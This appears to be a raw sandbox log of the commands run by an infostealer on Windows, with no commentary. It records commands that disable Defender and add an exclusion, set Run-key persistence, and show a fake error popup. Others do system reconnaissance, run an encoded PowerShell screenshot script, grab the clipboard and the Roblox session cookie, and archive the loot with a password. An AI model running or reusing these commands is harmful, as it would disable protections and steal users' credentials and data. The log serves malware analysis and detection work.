C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB7D.tmp\AB7E.tmp\AB7F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2E0.tmp\B2E1.tmp\B2E2.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2550zkfx\2550zkfx.cmdline"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC85.tmp" "c:\Users\Admin\AppData\Local\Temp\2550zkfx\CSCEDC1BD54A26B460EB6EB3D577667581.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BDAE.tmp\BDAF.tmp\BDB0.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3D8.tmp\C3D9.tmp\C3DA.bat C:\Windows\system32\java.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Files\onetap.exe
"C:\Users\Admin\AppData\Local\Temp\Files\onetap.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CAEC.tmp\CAED.tmp\CAEE.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
